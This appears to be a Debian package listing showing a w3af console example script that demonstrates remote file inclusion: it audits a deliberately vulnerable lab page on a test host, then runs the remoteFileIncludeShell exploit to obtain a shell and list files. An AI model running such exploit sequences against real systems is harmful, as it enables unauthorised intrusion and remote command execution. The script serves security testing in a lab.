/usr/share/doc/w3af-console/examples/script-rfiW3afSite.w3af is in w3af-console 1.1svn5547-1.1.
This file is owned by root:root, with mode 0o644.
The actual contents of the file can be viewed below.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | # This is the remoteFileInclude demo:
plugins
audit remoteFileInclude
audit config remoteFileInclude
view
set usew3afSite True
back
output console,textFile
output
output config textFile
set fileName output-w3af.txt
set verbose True
back
back
target
set target http://moth/w3af/remoteFileInclusion/vulnerable.php?file=f0as9
back
start
exploit
exploit config remoteFileIncludeShell
set listenAddress 127.0.0.1
back
exploit remoteFileIncludeShell
ls
|